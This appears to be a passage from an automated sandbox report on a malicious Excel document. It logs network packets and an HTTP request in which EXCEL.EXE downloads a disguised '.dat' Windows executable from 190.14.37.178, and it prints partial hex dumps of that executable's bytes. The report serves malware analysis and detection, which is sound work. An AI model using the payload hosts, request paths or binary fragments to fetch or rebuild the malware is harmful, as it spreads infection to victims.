Sep 27, 2021 21:19:49.975621939 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.975621939 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975636005 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975656986 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979290962 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979321003 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979453087 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979456902 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979470968 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979520082 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979526043 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979552031 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979569912 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979598045 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979617119 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979623079 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979645014 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979660988 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979705095 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979728937 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979748964 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979773045 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979830027 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979856968 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979873896 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979890108 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.979916096 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.979944944 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980007887 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980009079 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980014086 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980036974 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980051041 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980099916 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980166912 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980210066 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980242968 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980268002 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.980304956 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.980350018 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981239080 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981303930 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981364965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981409073 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981477022 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981523037 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.981538057 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981570005 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981575012 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981578112 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981580019 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.981581926 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.985538006 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.985640049 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.985685110 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.985713005 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.985724926 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.985755920 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.985759974 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.985781908 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.002861023 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.003078938 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.007978916 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.008028984 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.008488894 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.010122061 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020225048 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020263910 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020302057 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020339966 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020376921 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020416975 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020462990 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020466089 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020484924 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020526886 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020539045 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020567894 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020571947 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020606041 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020612001 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020644903 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020674944 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020689964 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020718098 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.020720959 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.020764112 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.031554937 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031610012 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031647921 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031687975 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031727076 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031833887 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.031904936 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.031909943 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.031913996 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.031929016 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031969070 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.031986952 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.032007933 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.032007933 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.032049894 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.032057047 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.032085896 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.032124996 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.032126904 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.032131910 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.032169104 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.036103010 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.036309004 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.049362898 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.049480915 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.049509048 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.049535990 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.049573898 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.049612999 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.049617052 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.049619913 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.049624920 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.049666882 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.050184011 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.050261021 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.050582886 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.050657988 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051594973 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051635027 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051677942 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051678896 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051691055 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051719904 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051748991 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051749945 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051764011 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051793098 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051799059 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051837921 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.051840067 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.051879883 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.065908909 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.065943956 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.065960884 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066198111 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066533089 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066608906 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066648006 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066667080 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066684008 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066700935 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066720963 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066740036 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066741943 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066756010 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066775084 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.066843033 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066857100 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066864014 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066868067 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.066874027 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.079022884 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079042912 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079055071 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079071999 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079083920 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079133987 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079157114 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079195976 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079230070 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079241037 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.079256058 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079287052 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.079376936 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079397917 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079411030 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079423904 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.079492092 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.079514027 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.079518080 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.080180883 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.094456911 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094510078 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094533920 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094552994 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094635963 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.094707012 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094724894 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094752073 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.094779015 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.094811916 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:50.094863892 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:50.111131907 CEST	49167	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:19:53.120857954 CEST	49167	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:19:59.127234936 CEST	49167	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:20:11.142129898 CEST	49168	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:20:14.151513100 CEST	49168	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:20:20.157989025 CEST	49168	80	192.168.2.22	185.250.148.213
Sep 27, 2021 21:20:53.987288952 CEST	80	49165	190.14.37.178	192.168.2.22
Sep 27, 2021 21:20:53.987549067 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:20:55.072591066 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:20:55.072788000 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:21:29.600687981 CEST	49165	80	192.168.2.22	190.14.37.178
Sep 27, 2021 21:21:29.601196051 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:21:29.630214930 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:21:29.780086040 CEST	80	49165	190.14.37.178	192.168.2.22

HTTP Request Dependency Graph

190.14.37.178

185.183.96.67

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	190.14.37.178	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 21:19:29.933981895 CEST	0	OUT	GET /44466.8890891204.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.178 Connection: Keep-Alive
Sep 27, 2021 21:19:31.596129894 CEST	1	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 19:19:31 GMT Content-Type: application/octet-stream Content-Length: 387072 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44466.8890891204.dat" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p\| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP
Sep 27, 2021 21:19:31.596172094 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 55 89 e5 83 c4 f8 e8 2e 36 00 00 3b d8 0f 84 46 02 00 00 60 03 fb 41 03 c8 50 51 68 25 01 00 00 83 bb fe 53 43 00 00 75 3a 68 00 20 00 00 68 0b 01 00 00 6a 77 6a 3b ff b3 Data Ascii: jU.6;F`APQh%SCu:h hjwj;YC~SCPCDU+,1SC1SC]^TCTYCuXDu1TYCuTChYCIXCu!YCPlDR+1IXCIXCZjKZCBSCu
Sep 27, 2021 21:19:31.596190929 CEST	4	IN	Data Raw: 43 00 68 f8 00 00 00 68 d7 01 00 00 ff b3 22 54 43 00 ff b3 af 51 43 00 6a 01 6a 00 ff 93 a0 10 44 00 89 75 f8 31 f6 09 c6 89 b3 0c 59 43 00 8b 75 f8 8d 83 d2 54 43 00 50 6a 40 83 bb 68 59 43 00 00 75 1a ff 93 58 10 44 00 51 2b 0c e4 09 c1 83 a3 Data Ascii: Chh"TCQCjjDu1YCuTCPj@hYCuXDQ+hYChYCYbTCTCPPCPDDj1YCYPC<D;tifSCu!WCPhDW1fSC1fSC_NWCRCHRCu%XCPdDU3UHRC
Sep 27, 2021 21:19:31.596213102 CEST	6	IN	Data Raw: 83 bb 5e 51 43 00 00 75 36 50 51 ff b3 be 53 43 00 ff 93 a4 10 44 00 6a 00 89 14 e4 31 d2 09 c2 89 93 5e 51 43 00 5a 81 e1 00 00 00 00 0b 0c e4 83 c4 04 81 e0 00 00 00 00 8f 45 f8 33 45 f8 03 4d 0c 53 89 cb 33 5d 08 89 d9 5b 83 bb ce 54 43 00 00 Data Ascii: ^QCu6PQSCDj1^QCZE3EMS3][TCuf,UCu1PQlXCPdDj,)1,UC]EEPQWCPlDPEuTC)3);Mv?QCu3PQSCPdDj1QCY
Sep 27, 2021 21:19:31.596232891 CEST	7	IN	Data Raw: bb 13 53 43 00 00 75 27 50 ff 93 60 10 44 00 89 75 e4 83 e6 00 31 c6 83 a3 13 53 43 00 00 09 b3 13 53 43 00 8b 75 e4 31 c0 0b 04 e4 83 ec fc 89 7d e4 29 ff 09 c7 89 bb a8 50 43 00 8b 7d e4 83 bb 84 58 43 00 00 75 3b 68 00 10 00 00 6a 4b ff b3 49 Data Ascii: SCu'P`Du1SCSCu1})PC}XCu;hjKIUC<PCTCUCUCD}1XC}}UCu$pYCpDM+MUCUCMUVCuAXDM1UVC1UVCMTCujj
Sep 27, 2021 21:19:31.596358061 CEST	8	IN	Data Raw: 44 00 57 2b 3c e4 09 c7 83 a3 3f 52 43 00 00 09 bb 3f 52 43 00 5f 31 c0 0b 04 e4 83 c4 04 56 33 34 e4 09 c6 83 a3 b0 52 43 00 00 09 b3 b0 52 43 00 5e 83 bb b3 51 43 00 00 75 26 ff b3 a9 56 43 00 ff b3 78 59 43 00 ff 93 a8 10 44 00 51 83 e1 00 09 Data Ascii: DW+<?RC?RC_1V34RCRC^QCu&VCxYCDQQC1QCYEU1SCu7QRRCPhD}+}SCSC}1)RQV34u1^LRCu'P\DULRC1LRCU)EESC
Sep 27, 2021 21:19:31.596374035 CEST	9	IN	Data Raw: 8d 83 d2 54 43 00 50 6a 02 52 83 bb 10 50 43 00 00 75 1e ff 93 58 10 44 00 89 75 f8 83 e6 00 31 c6 83 a3 10 50 43 00 00 31 b3 10 50 43 00 8b 75 f8 57 ff 93 3c 10 44 00 81 e7 00 00 00 00 8f 45 f8 03 7d f8 83 bb c6 54 43 00 00 75 1e ff 93 58 10 44 Data Ascii: TCPjRPCuXDu1PC1PCuW<DE}TCuXDu3u1TC1TCuU]WQMY]3_]QPCP]XCPD
Sep 27, 2021 21:19:31.596401930 CEST	10	IN	Data Raw: 44 00 57 83 e7 00 31 c7 83 a3 94 52 43 00 00 09 bb 94 52 43 00 5f 81 e1 00 00 00 00 0b 0c e4 83 ec fc 03 77 14 8b 7f 0c 03 bb b0 50 43 00 f3 a4 83 bb 44 59 43 00 00 75 1d 8d 83 21 5a 43 00 50 ff 93 54 10 44 00 89 75 f8 29 f6 31 c6 89 b3 44 59 43 Data Ascii: DW1RCRC_wPCDYCu!ZCPTDu)1DYCuE}U(]VCujDu)VCuM6PCujTCDj<)1PC_)<U3U3W(1UPCvSCu2P$UCPl
Sep 27, 2021 21:19:31.596425056 CEST	11	IN	Data Raw: e5 00 09 c5 83 a3 58 59 43 00 00 31 ab 58 59 43 00 5d 03 7d 08 83 3f 00 0f 85 90 00 00 00 83 bb 33 52 43 00 00 75 20 6a 01 ff 93 a4 10 44 00 89 7d e8 2b 7d e8 31 c7 83 a3 33 52 43 00 00 31 bb 33 52 43 00 8b 7d e8 83 bb ba 53 43 00 00 75 25 8d 83 Data Ascii: XYC1XYC]}?3RCu jD}+}13RC13RC}SCu%pRCPTDU1SCSCUU)WU6YCu!aUCPhDU1YC1YC]E)3EwYXCu PCDV34YXCYXC^EuEuX
Sep 27, 2021 21:19:31.596474886 CEST	13	IN	Data Raw: db 09 c3 89 5d fc 8b 5d f0 0f b7 47 14 03 f8 55 89 fd 81 c5 c0 ff ff ff 89 ef 5d 89 55 f0 31 d2 0b 17 89 d0 8b 55 f0 50 09 04 e4 58 75 05 e9 e9 00 00 00 89 5d f0 33 5d f0 0b 5f 04 83 e1 00 09 d9 8b 5d f0 03 45 f8 03 45 fc 57 83 e7 00 33 7d fc 83 Data Ascii: ]]GU]U1UPXu]3]_]EEW3}1_uU)3UQU3,3h1]QS[S[YQWY#E3MRZt*P}3}}}:W_IS
